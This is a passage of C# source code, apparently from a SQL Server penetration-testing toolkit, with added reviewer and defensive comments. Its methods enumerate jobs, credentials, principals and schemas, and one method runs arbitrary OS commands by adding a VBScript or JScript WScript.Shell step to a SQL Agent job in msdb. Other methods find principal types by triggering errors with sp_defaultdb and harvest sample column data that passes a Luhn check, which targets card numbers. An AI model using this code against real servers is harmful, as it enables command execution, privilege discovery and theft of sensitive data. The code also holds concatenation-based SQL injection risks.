        string[] filters = new string[] { auditNameFilter, auditSpecificationFilter, auditActionNameFilter };
        foreach (string filter in filters)
        {
            if (!string.IsNullOrEmpty(filter))
            {
                statement.Append(filter);
            }
        }

        string text = statement.ToString();
#if DEBUG
        Console.WriteLine(text);
#endif
        databaseSpecifications = conn.Query <DatabaseSpecification>(text, new DatabaseSpecification());
    }
    return true;
}
/// <summary>
/// Wraps <paramref name="query"/> in a VBScript or JScript template (chosen by
/// <c>subsystem</c>), adds it as an ActiveScripting job step to a job in msdb, then runs the
/// <c>QUERY2_1</c> and <c>QUERY3_1</c> statements and prints their "output" column.
/// </summary>
/// <remarks>
/// Returns early when the connection fails, when <c>_Check</c> fails, or when
/// <c>subsystem</c> is neither "vbscript" nor "jscript" (compared case-insensitively).
/// Defensive notes: the job and step names are the fixed strings <c>powerupsql_job</c> and
/// <c>powerupsql_job_step</c>, so their appearance in the msdb job tables is a direct
/// indicator; job steps using the ActiveScripting subsystem are rare in normal operation and
/// worth reviewing wherever they appear.
/// </remarks>
/// <param name="query">Command text; single quotes are doubled before it is placed in the templates.</param>
internal void Query(string query)
{
    using (SQLConnection sql = new SQLConnection(instance))
    {
        sql.BuildConnectionString(credentials);
        if (!sql.Connect())
        {
            return;
        }

        if (!_Check(sql))
        {
            return;
        }

        string command = string.Empty;
        string dbSubSystem = string.Empty;

        // Double single quotes because the script ends up inside an N'...' T-SQL literal.
        query = query.Replace("\'", "\'\'");

        // Both templates are formatted up front; only one is used below.
        string command_j = string.Format(
            "function RunCmd()\n" +
            "{\n" +
            "var WshShell = new ActiveXObject(\"WScript.Shell\");\n" +
            "var oExec = WshShell.Exec(\"{0}\");\n" +
            "oExec = null;\n" +
            "WshShell = null;\n" +
            "}\n" +
            "RunCmd();",
            query
            );

        string command_a = string.Format(
            "Function Main()\n" +
            "dim shell\n" +
            "set shell = CreateObject(\"WScript.Shell\")\n" +
            "shell.run(\"{0}\")\n" +
            "set shell = nothing\n" +
            "END Function",
            query
            );

        if (subsystem.ToLower() == "vbscript")
        {
            command = command_a;
            dbSubSystem = "N\'VBScript\',";
        }
        else if (subsystem.ToLower() == "jscript")
        {
            command = command_j;
            dbSubSystem = "N\'JavaScript\',";
        }
        else
        {
            return;
        }

        // Only {1} (command) is referenced by the format string; subsystem is passed but unused.
        string query1_1 = string.Format(
            "USE msdb;\n" +
            "EXECUTE dbo.sp_add_job\n" +
            "@job_name = N\'powerupsql_job\'\n" +
            "EXECUTE sp_add_jobstep\n" +
            "@job_name = N\'powerupsql_job\',\n" +
            "@step_name = N\'powerupsql_job_step\',\n" +
            "@subsystem = N'ActiveScripting',\n" +
            "@command = N\'{1}\',\n",
            subsystem, command
            );

        StringBuilder sb = new StringBuilder();
        sb.Append(query1_1);
        sb.Append(dbSubSystem);
        sb.Append(QUERY1_2);
#if DEBUG
        Console.WriteLine(sb.ToString());
#endif
        Console.WriteLine((string)_Query(sql, sb.ToString(), "output"));

        sb.Clear();
        sb.Append(QUERY2_1);
#if DEBUG
        Console.WriteLine(sb.ToString());
#endif
        Console.WriteLine(App.DELIMITER);
        Console.WriteLine((string)_Query(sql, sb.ToString(), "output"));
        Console.WriteLine(App.DELIMITER);

        sb.Clear();
        sb.Append(QUERY3_1);
#if DEBUG
        Console.WriteLine(sb.ToString());
#endif
        Console.WriteLine((string)_Query(sql, sb.ToString(), "output"));
    }
}
/// <summary>
/// Lists SQL Server Agent jobs and their steps: runs <c>QUERY2_1</c> with the optional
/// keyword, subsystem and proxy-credential filters and converts every row into a
/// <c>ServerJob</c> in <c>serverJobs</c>.
/// </summary>
/// <remarks>
/// Rows are converted after the connection has been disposed, from the <c>table</c> field.
/// Every column is cast directly, so a NULL in any of them ends the listing with an error
/// message and a false return.
/// </remarks>
/// <returns>
/// false when the connection fails, <c>_Check</c> fails, or a row cannot be converted;
/// otherwise true.
/// </returns>
internal override bool Query()
{
    using (SQLConnection conn = new SQLConnection(instance))
    {
        conn.BuildConnectionString(credentials);
        if (!conn.Connect())
        {
            return false;
        }
        if (!_Check(conn))
        {
            return false;
        }

        StringBuilder statement = new StringBuilder();
        statement.Append(QUERY2_1);

        // Filters are appended in a fixed order; unset ones are skipped.
        string[] filters = new string[] { keywordFilter, subsystemFilter, proxyCredFilter, usingProxyCredFilter };
        foreach (string filter in filters)
        {
            if (!string.IsNullOrEmpty(filter))
            {
                statement.Append(filter);
            }
        }
        table = conn.Query(statement.ToString());
    }

    foreach (DataRow row in table.AsEnumerable())
    {
        try
        {
            ServerJob job = new ServerJob
            {
                ComputerName = computerName,
                Instance = instance,
                DatabaseName = database,
                Job_Id = (int)row["Job_Id"],
                Job_Name = (string)row["Job_Name"],
                Job_Description = (string)row["Job_Description"],
                Job_Owner = (string)row["Job_Owner"],
                Proxy_Id = (int)row["Proxy_Id"],
                Proxy_Credential = (string)row["Proxy_Credential"],
                Date_Created = (string)row["Date_Created"],
                Last_Run_Date = (DateTime)row["Last_Run_Date"],
                Enabled = (bool)row["Enabled"],
                Server = (string)row["Server"],
                Step_Name = (string)row["Step_Name"],
                SubSystem = (string)row["SubSystem"],
                Command = (string)row["Command"]
            };
#if DEBUG
            Misc.PrintStruct <ServerJob>(job);
#endif
            serverJobs.Add(job);
        }
        catch (ArgumentNullException)
        {
            Console.WriteLine("Empty Response");
            return false;
        }
        catch (Exception ex)
        {
            Console.WriteLine(ex.Message);
            return false;
        }
    }
    return true;
}
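/// <summary>
/// Lists credential objects on the instance: runs the fixed ComputerName/Instance columns plus
/// <c>QUERY1_2</c> against master, with the optional <c>credentialFilter</c>, and stores the
/// mapped rows in <c>serverCredentials</c>.
/// </summary>
/// <returns>false when the connection fails; otherwise true.</returns>
internal override bool Query()
{
    using (SQLConnection sql = new SQLConnection(instance))
    {
        sql.BuildConnectionString(credentials);
        if (!sql.Connect())
        {
            return false;
        }

        StringBuilder sb = new StringBuilder();
        sb.Append(string.Format("USE master;\nSELECT \'{0}\' as [ComputerName],\n\'{1}\' as [Instance],", computerName, instance));
        sb.Append(QUERY1_2);
        if (!string.IsNullOrEmpty(credentialFilter))
        {
            sb.Append(credentialFilter);
        }
#if DEBUG
        Console.WriteLine(sb.ToString());
#endif
        serverCredentials = sql.Query <ServerCredential>(sb.ToString(), new ServerCredential());
    }

    // Report success once the query has run, matching the other listing methods;
    // false is reserved for a failed connection.
    return true;
}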
/// <summary>
/// Enumerates server principals by calling SUSER_NAME() over the first <c>end</c> row numbers,
/// stores each named principal in <c>fuzzed</c>, then classifies every entry from the error
/// text returned by a deliberately invalid <c>sp_defaultdb</c> call.
/// </summary>
/// <remarks>
/// Classification rules, as coded: a <c>SqlException</c> whose message contains
/// "NOTAREALDATABASE" or "alter the login" marks the name as "Windows Account" when it
/// contains a backslash and "SQL Login" otherwise; any other <c>SqlException</c> marks it as
/// "SQL Server Role". When the call raises nothing, <c>PrincipalType</c> stays empty.
/// Defensive note: a burst of sp_defaultdb calls naming the database
/// <c>NOTAREALDATABASE1234ABCD</c> is a distinctive trace of this routine.
/// NOTE(review): <c>PrincipleName</c> comes from server results and is placed inside a quoted
/// literal as-is; a name containing a single quote would break the statement.
/// </remarks>
/// <returns>
/// false when the connection fails or a row raises anything other than
/// <see cref="ArgumentNullException"/> during enumeration; otherwise true.
/// </returns>
internal override bool Query()
{
    using (SQLConnection sql = new SQLConnection(instance))
    {
        sql.BuildConnectionString(credentials);
        if (!sql.Connect())
        {
            return(false);
        }

        // The cross join of spt_values with itself only serves as a row source for row_number().
        string query1_1 = string.Format(
            "SELECT \'{0}\' as [ComputerName],\n" +
            "\'{1}\' as [Instance],\n" +
            "n as [PrincipalId],\n" +
            "SUSER_NAME(n) as [PrincipleName]\n" +
            "FROM(\n" +
            "SELECT top {2} row_number() over(order by t1.number) as N\n" +
            "FROM master..spt_values t1\n" +
            " cross join master..spt_values t2\n" +
            ") a\n" +
            "WHERE SUSER_NAME(n) is not null",
            computerName, instance, end
            );
#if DEBUG
        Console.WriteLine(query1_1);
#endif
        foreach (var row in sql.Query(query1_1).AsEnumerable())
        {
            try
            {
                Fuzz f = new Fuzz
                {
                    ComputerName = computerName,
                    Instance = instance,
                    PrincipalId = (long)row["PrincipalId"],
                };
                if (!(row["PrincipleName"] is DBNull))
                {
                    f.PrincipleName = (string)row["PrincipleName"];
                    // Filled in by the classification pass below.
                    f.PrincipalType = string.Empty;
                    fuzzed.Add(f);
                }
                else
                {
                    continue;
                }
            }
            catch (Exception ex)
            {
                if (ex is ArgumentNullException)
                {
                    continue;
                }
                else
                {
                    Console.WriteLine(ex.Message);
                }
                return(false);
            }
        }

        // Work on an array copy so elements can be updated in place
        // (presumably because Fuzz is a struct - TODO confirm).
        Fuzz[] arrFuzz = fuzzed.ToArray();
        for (int i = 0; i < fuzzed.Count; i++)
        {
            string query2_1 = string.Format("EXEC master..sp_defaultdb \'{0}\', \'NOTAREALDATABASE1234ABCD\'", arrFuzz[i].PrincipleName);
            try
            {
                // The reader is opened only to execute the statement; its rows are never read.
                using (SqlDataReader reader = new SqlCommand(query2_1, sql.GetSQL()).ExecuteReader()){ }
            }
            catch (Exception ex)
            {
                if (ex is SqlException)
                {
                    if (ex.Message.Contains("NOTAREALDATABASE") || ex.Message.Contains("alter the login"))
                    {
                        if (arrFuzz[i].PrincipleName.Contains(@"\"))
                        {
                            arrFuzz[i].PrincipalType = "Windows Account";
                        }
                        else
                        {
                            arrFuzz[i].PrincipalType = "SQL Login";
                        }
                    }
                    else
                    {
                        arrFuzz[i].PrincipalType = "SQL Server Role";
                    }
                }
                else
                {
                    Console.WriteLine(ex);
                }
            }
        }
        fuzzed = arrFuzz.ToList();
    }
    return(true);
}
/// <summary>
/// Lists the schemas of <c>database</c> from its INFORMATION_SCHEMA.SCHEMATA view, with the
/// optional <c>schemaFilter</c>, and stores the mapped rows in <c>schemas</c>.
/// </summary>
/// <remarks>
/// NOTE(review): the USE statement takes <c>database</c> unbracketed while the FROM clause
/// brackets it; both receive the value as-is.
/// </remarks>
/// <returns>false when the connection fails; otherwise true.</returns>
internal override bool Query()
{
    string selectHead = string.Format(
        "USE {0};\n" +
        "SELECT \'{1}\' as [ComputerName],\n" +
        "\'{2}\' as [Instance],",
        database, computerName, instance
        );
    string fromClause = string.Format(
        "FROM [{0}].[INFORMATION_SCHEMA].[SCHEMATA]",
        database
        );

    using (SQLConnection conn = new SQLConnection(instance))
    {
        conn.BuildConnectionString(credentials);
        if (!conn.Connect())
        {
            return false;
        }

        StringBuilder statement = new StringBuilder();
        statement.Append(selectHead);
        statement.Append(QUERY1_2);
        statement.Append(fromClause);
        if (!string.IsNullOrEmpty(schemaFilter))
        {
            statement.Append(schemaFilter);
        }
        statement.Append(QUERY1_4);

        string text = statement.ToString();
#if DEBUG
        Console.WriteLine(text);
#endif
        schemas = conn.Query <Schema>(text, new Schema());
    }
    return true;
}
/// <summary>
/// Lists the role principals (type 'R') of <c>database</c> from sys.database_principals, with
/// the optional role-name and role-owner filters, and stores the mapped rows in
/// <c>databaseRoles</c>.
/// </summary>
/// <returns>false when the connection fails; otherwise true.</returns>
internal override bool Query()
{
    using (SQLConnection conn = new SQLConnection(instance))
    {
        conn.BuildConnectionString(credentials);
        if (!conn.Connect())
        {
            return false;
        }

        string selectHead = string.Format(
            "USE {0};\n" +
            "SELECT \'{1}\' as [ComputerName],\n" +
            "\'{2}\' as [Instance],\n" +
            "\'{0}\' as [DatabaseName],",
            database, computerName, instance);
        string fromClause = string.Format(
            "FROM [{0}].[sys].[database_principals]\n" +
            "WHERE type like \'R\'",
            database);

        StringBuilder statement = new StringBuilder();
        statement.Append(selectHead);
        statement.Append(QUERY1_2);
        statement.Append(fromClause);

        // Filters are appended in a fixed order; unset ones are skipped.
        string[] filters = new string[] { rolePrincipalNameFilter, roleOwnerFilter };
        foreach (string filter in filters)
        {
            if (!string.IsNullOrEmpty(filter))
            {
                statement.Append(filter);
            }
        }

        string text = statement.ToString();
#if DEBUG
        Console.WriteLine(text);
#endif
        databaseRoles = conn.Query <DatabaseRole>(text, new DatabaseRole());
    }
    return true;
}
/// <summary>
/// Lists DDL triggers: fixed ComputerName/Instance columns plus <c>QUERY1_2</c>, with the
/// optional <c>triggerNameFilter</c>, stored in <c>triggers</c>.
/// </summary>
/// <returns>false when the connection fails; otherwise true.</returns>
internal override bool Query()
{
    using (SQLConnection conn = new SQLConnection(instance))
    {
        conn.BuildConnectionString(credentials);
        if (!conn.Connect())
        {
            return false;
        }

        StringBuilder statement = new StringBuilder();
        statement.Append(string.Format(
            "SELECT \'{0}\' as [ComputerName],\n" +
            "\'{1}\' as [Instance],",
            computerName, instance));
        statement.Append(QUERY1_2);

        bool hasNameFilter = !string.IsNullOrEmpty(triggerNameFilter);
        if (hasNameFilter)
        {
            statement.Append(triggerNameFilter);
        }

        string text = statement.ToString();
#if DEBUG
        Console.WriteLine(text);
#endif
        triggers = conn.Query <TriggerDdl>(text, new TriggerDdl());
    }
    return true;
}
/// <summary>
/// Stores the mapped rows of one of two statements in <c>files</c>: <c>QUERY2_1</c> alone when
/// <c>showAll</c> is set, otherwise a statement scoped to <c>database</c> (<c>QUERY1_2</c>
/// plus the optional <c>assemblyNameFilter</c>).
/// </summary>
/// <remarks>
/// NOTE(review): the scoped statement selects FROM [sys].[triggers] while the result type is
/// <c>AssemblyFiles</c> and the filter is named for assemblies - confirm the FROM clause.
/// </remarks>
/// <returns>false when the connection fails; otherwise true.</returns>
internal override bool Query()
{
    using (SQLConnection conn = new SQLConnection(instance))
    {
        conn.BuildConnectionString(credentials);
        if (!conn.Connect())
        {
            return false;
        }

        string useClause = string.Format("USE {0};", database);
        string fromClause = string.Format(
            "FROM [{0}].[sys].[triggers] WHERE 1=1",
            database);

        StringBuilder statement = new StringBuilder();
        if (!showAll)
        {
            statement.Append(useClause);
            statement.Append(QUERY1_2);
            statement.Append(fromClause);
            if (!string.IsNullOrEmpty(assemblyNameFilter))
            {
                statement.Append(assemblyNameFilter);
            }
        }
        else
        {
            statement.Append(QUERY2_1);
        }

        string text = statement.ToString();
#if DEBUG
        Console.WriteLine(text);
#endif
        files = conn.Query <AssemblyFiles>(text, new AssemblyFiles());
    }
    return true;
}
/// <summary>
/// After the base query has filled <c>base.columns</c>, reads up to <c>sampleSize</c> non-null
/// values from each listed column and stores them in <c>results</c>. With <c>checkLuhn</c>
/// set, string values that fail <c>Misc.CheckLuhn</c> are dropped.
/// </summary>
/// <remarks>
/// Sampled values are stored as-is, so <c>results</c> may hold real sensitive data and should
/// be handled accordingly.
/// NOTE(review): database and table names come from server metadata and are inserted into
/// the statement unbracketed.
/// </remarks>
/// <returns>false when the base query or the connection fails; otherwise true.</returns>
internal override bool Query()
{
    if (!base.Query())
    {
        return false;
    }

    using (SQLConnection conn = new SQLConnection(instance))
    {
        conn.BuildConnectionString(credentials);
        if (!conn.Connect())
        {
            return false;
        }

        foreach (var c in base.columns)
        {
            string statement = string.Format(
                "USE {0}; SELECT TOP {1} [{2}] FROM {3} WHERE [{2}] is not null",
                c.DatabaseName, sampleSize, c.ColumnName, c.TableName);
#if DEBUG
            Console.WriteLine(statement);
#endif
            DataTable sample = conn.Query(statement);
            try
            {
                foreach (DataRow row in sample.AsEnumerable())
                {
                    if (string.IsNullOrEmpty(c.ColumnName))
                    {
                        continue;
                    }

                    object value = row[c.ColumnName];

                    // The Luhn filter applies to string values only; other types pass through.
                    if (checkLuhn && value is string && !Misc.CheckLuhn((string)value))
                    {
                        continue;
                    }

                    results.Add(new SampleData
                    {
                        Instance = instance,
                        DatabaseName = c.DatabaseName,
                        TableName = c.TableName,
                        ColumnName = c.ColumnName,
                        ColumnData = value
                    });
                }
            }
            catch (ArgumentNullException)
            {
                Console.WriteLine("Empty Response");
            }
            catch (Exception ex)
            {
                // A failing column is reported and the remaining columns are still sampled.
                Console.WriteLine(ex.Message);
            }
        }
    }
    return true;
}
/// <summary>
/// Collects server information into <c>details</c> from the first row of a statement built
/// from the <c>query1_*</c> fragments; the <c>query1_2</c> and <c>query1_5</c> fragments and
/// the OsMachineType/OSVersionName fields are used only when the login is a sysadmin.
/// </summary>
/// <remarks>
/// The row is converted after the connection has been disposed, from the <c>table</c> field.
/// </remarks>
/// <returns>
/// true when the first row converts cleanly; false when the connection fails, no row is
/// returned, or the conversion throws.
/// </returns>
internal override bool Query()
{
    bool isSysAdmin = false;

    using (SQLConnection conn = new SQLConnection(instance))
    {
        conn.BuildConnectionString(credentials);
        if (!conn.Connect())
        {
            return false;
        }

        isSysAdmin = SQLSysadminCheck.Query(instance, computerName, credentials);

        string statement = query1_1;
        if (isSysAdmin)
        {
            statement = statement + query1_2;
        }
        statement = statement + string.Format("SELECT \'{0}\' as [ComputerName],\n", computerName);
        statement = statement + query1_4;
        if (isSysAdmin)
        {
            statement = statement + query1_5;
        }
        statement = statement + query1_6;

        table = conn.Query(statement);
    }

    // Only the first row is ever consumed.
    foreach (DataRow row in table.AsEnumerable())
    {
        try
        {
            details = new Details
            {
                ComputerName = (string)row["ComputerName"],
                Instance = (string)row["Instance"],
                DomainName = (string)row["DomainName"],
                ServiceProcessID = (int)row["ServiceProcessID"],
                ServiceName = (string)row["ServiceName"],
                ServiceAccount = (string)row["ServiceAccount"],
                AuthenticationMode = (string)row["AuthenticationMode"],
                ForcedEncryption = (int)row["ForcedEncryption"],
                Clustered = (string)row["Clustered"],
                SQLServerVersionNumber = (string)row["SQLServerVersionNumber"],
                SQLServerMajorVersion = (string)row["SQLServerMajorVersion"],
                SQLServerEdition = (string)row["SQLServerEdition"],
                SQLServerServicePack = (string)row["SQLServerServicePack"],
                OSArchitecture = (string)row["OSArchitecture"],
                OsVersionNumber = (string)row["OsVersionNumber"],
                Currentlogin = (string)row["Currentlogin"]
            };
            if (isSysAdmin)
            {
                details.OsMachineType = (string)row["OsMachineType"];
                details.OSVersionName = (string)row["OSVersionName"];
            }
#if DEBUG
            Misc.PrintStruct <Details>(details);
#endif
            return true;
        }
        catch (ArgumentNullException)
        {
            Console.WriteLine("Empty Response");
            return false;
        }
        catch (Exception ex)
        {
            Console.WriteLine(ex.Message);
            return false;
        }
    }
    return false;
}